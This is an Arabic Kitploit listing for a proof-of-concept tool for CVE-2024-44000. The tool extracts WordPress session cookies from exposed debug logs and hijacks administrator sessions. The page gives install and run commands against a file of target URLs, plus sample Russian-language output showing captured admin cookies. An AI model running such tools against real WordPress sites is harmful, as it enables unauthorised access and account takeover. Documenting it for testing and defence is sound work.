Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-44000 — هي أداة إثبات مفهوم (PoC) مصممة لاستغلال سجلات التصحيح المكشوفة بشكل غير آمن من مواقع ووردبريس (WordPress) واستخراج كعكات الجلسة. | Kitploit
أدوات/GitHubGitHub/geniuszly/cve-2024-44000
الاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالفريق الأحمر
GitHubgeniuszly/cve-2024-44000

CVE-2024-44000

هي أداة إثبات مفهوم (PoC) مصممة لاستغلال سجلات التصحيح المكشوفة بشكل غير آمن من مواقع ووردبريس (WordPress) واستخراج كعكات الجلسة.

عرض المستودع
5منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

EN

GenCookieSessionHijack هي أداة PoC مصممة لاستغلال سجلات التصحيح المكشوفة بشكل غير آمن من مواقع WordPress واستخراج كعكات الجلسة. يتيح ذلك للمهاجم اختطاف جلسات المسؤول النشطة والحصول على وصول غير مصرح به إلى لوحة تحكم WordPress.

الميزات

  • استخراج الكعكات من سجلات تصحيح WordPress.
  • تحديد وتصفية كعكات الجلسة (مثل wordpress_logged_in).
  • محاولة اختطاف الجلسة تلقائيًا للوصول إلى لوحة المسؤول.
  • فتح جلسة المسؤول المختطفة مباشرة في المتصفح.

الاستخدام

التثبيت

root@kitploit:~
git clone https://github.com/geniuszly/CVE-2024-44000
cd CVE-2024-44000
pip install -r requirements.txt

تشغيل الأداة

  1. قم بإعداد قائمة بعناوين URL المستهدفة لـ WordPress في ملف، كل عنوان في سطر (مثل list.txt).
  2. قم بتشغيل الأداة باستخدام الأمر التالي:
root@kitploit:~
python GenCookieSessionHijack.py -f list.txt -o result.txt

المعلمات

  • -f, --file: المسار إلى الملف الذي يحتوي على قائمة عناوين URL (الافتراضي: list.txt).
  • -o, --output: الملف لحفظ النتائج (الافتراضي: result.txt).

مثال

root@kitploit:~
python GenCookieSessionHijack.py -f targets.txt -o output.txt

سيقرأ هذا قائمة عناوين URL من targets.txt، ويحاول استخراج واستخدام كعكات الجلسة، ويحفظ النتائج في output.txt.

المخرجات

إذا كانت محاولة اختطاف الجلسة ناجحة، ستقوم الأداة بإنشاء عنوان URL مع كعكة جلسة المسؤول المختطفة وفتحه مباشرة في المتصفح الافتراضي.

مثال على المخرجات:

root@kitploit:~
[+] Лог-файл успешно получен с http://example.com
[+] Найдены session cookies для http://example.com:
    wordpress_logged_in_abcdef123456
[+] Успешно захвачен сеанс администратора с cookie: wordpress_logged_in_abcdef123456
[+] URL захваченного сеанса: http://example.com/wp-login.php?redirect_to=http://example.com/wp-admin/?wordpress_logged_in_abcdef123456
[+] Установленный cookie: http://example.com/wp-login.php?cookie=wordpress_logged_in_abcdef123456

[-] Не удалось захватить сеанс администратора с cookie: wordpress_logged_in_invalidcookie

[-] Session cookies не найдены в логах для http://another-example.com
[-] Не удалось получить лог-файл для http://another-example.com. Код ответа: 404

إخلاء مسؤولية قانوني

هذه الأداة مخصصة للأغراض التعليمية فقط ولا ينبغي استخدامها في أنشطة غير قانونية. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة.

تنزيل الأداة